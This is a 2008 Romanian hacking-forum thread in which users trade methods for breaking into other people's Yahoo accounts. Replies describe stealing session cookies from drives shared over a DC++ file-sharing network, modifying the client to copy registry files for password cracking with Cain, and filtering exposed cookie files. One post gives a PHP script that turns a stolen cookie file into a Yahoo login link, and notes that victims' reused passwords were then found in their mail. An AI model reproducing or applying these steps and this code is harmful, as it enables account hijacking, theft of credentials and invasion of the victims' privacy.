killerboy Posted May 16, 2008 Report Posted May 16, 2008 era un tutorial care iti zicea cum sa faci sa afli parola dak iei c`ul de la cei care isi pun pe odc c`ul iei nu stiu ce de akolo si dupa le afli parola la yahoo.Nul mai gasesc va rog ajutatima sa il caut !!! Quote
Grunt Posted May 16, 2008 Report Posted May 16, 2008 Nu poti afla parola de la Yahoo. Poti in schimb sa ii iei cookie-ul, si sa te loghezi automat ca el. Dar daca vrei sa vezi detaliile contului, iti cere parola, si nu o stii. Imi pare rau, prietene, soarta e foarte cruda, stiu. Rezista, caci iti sunt alaturi in cele mai negre clipe. Impreuna, vom rivaliza soarta si vom prospera.Da, e 1 jumate noaptea, nu mi-e somn si sunt teribil de plictisit. Quote
puskin Posted May 16, 2008 Report Posted May 16, 2008 era un tutorial care iti zicea cum sa faci sa afli parola dak iei c`ul de la cei care isi pun pe odc c`ul iei nu stiu ce de akolo si dupa le afli parola la yahoo.Nul mai gasesc va rog ajutatima sa il caut !!!fara credentiale nu ai ce sa faci...o parte din registrii sunt stocati in C:....daca iti modifici clientul de odc...dc++ sa copie fisierele acelea poti afla parolele stocate cu "Cain" de pe oxid.it incluzand si messengerul.... Quote
loki Posted May 17, 2008 Report Posted May 17, 2008 am inteles dein tutoriale ca yahoo nu mai stocheaza parola ci EST-ul. Dar poti sa iei cookie de pe odc la cati ratati isi shereaza C:\. Da o cautare dupa @yahoo de tip documente. Gasesti cookie-urile. Aranjeaza dupa dimensiune si ia-le pe alea de la 900 bytes la 1,5K Page down si care au cookie Y si T is bune. Am un script facut dar merge numai local (in apache), se poate imbunatati continuand partea de upload dar n-am avut eu timp, l-am facut sa ia doar numele fisierului de acolo.<?php$link="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];$file=$_POST['filename'];?><FORM action=<? echo $link;?> method="post" name="read"> <INPUT type="file" name="readfile" onChange="document.read.filename.value=document.read.readfile.value;"> <INPUT type="hidden" name="filename"> <INPUT type="submit" value="Send"></form><?if($file){ $cookie=file_get_contents($file); $cookietable = explode('*', $cookie); for($i=0;$i<count($cookietable); $i++) { if(($cookietable[$i][1]=='Y')&&($cookietable[$i][3]=='v')) $y=substr($cookietable[$i],3); if(($cookietable[$i][1]=='T')&&($cookietable[$i][3]=='z')) $t=substr($cookietable[$i],3); }$y=explode("yahoo.com",$y); $y=$y[0];$t=explode("yahoo.com",$t); $t=$t[0];$y = ereg_replace(';', '',$y);$y = ereg_replace('&', '%26',$y);$y = ereg_replace('=', '%3D',$y);$y = 'Y%3D'.$y;$t = ereg_replace(';', '',$t);$t = ereg_replace('&', '%26',$t);$t = ereg_replace('=', '%3D',$t);$t = 'T%3D'.$t;echo $y."".$t.""; echo '[url="http://msg.edit.yahoo.com/config/reset_cookies?.y='.$y.'&.t='.$t.'&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0"]Test Cookie Link[/url]';}?>Incarcati un administrator@yahoo.com.txt sau cum ii zice la un cookie si va ofera link spre mail.La 2 din 3 le-am gasit si parola in mail: o foloseau pe aceeasi la alte servicii. Quote
killerboy Posted May 17, 2008 Author Report Posted May 17, 2008 vreau un tutorial la fel cum era si acel link despre care vb sa ma ajutati sa il caut dak se poate! Quote
emac14 Posted May 19, 2008 Report Posted May 19, 2008 Mai cautati in acest forum nu mai stiu sigur pe unde un post al lui Slick despre criptare si ETS ale Yahoo-ului !!! :idea: Ca asa pe Google se gasesc multe prostii !!! :twisted: Quote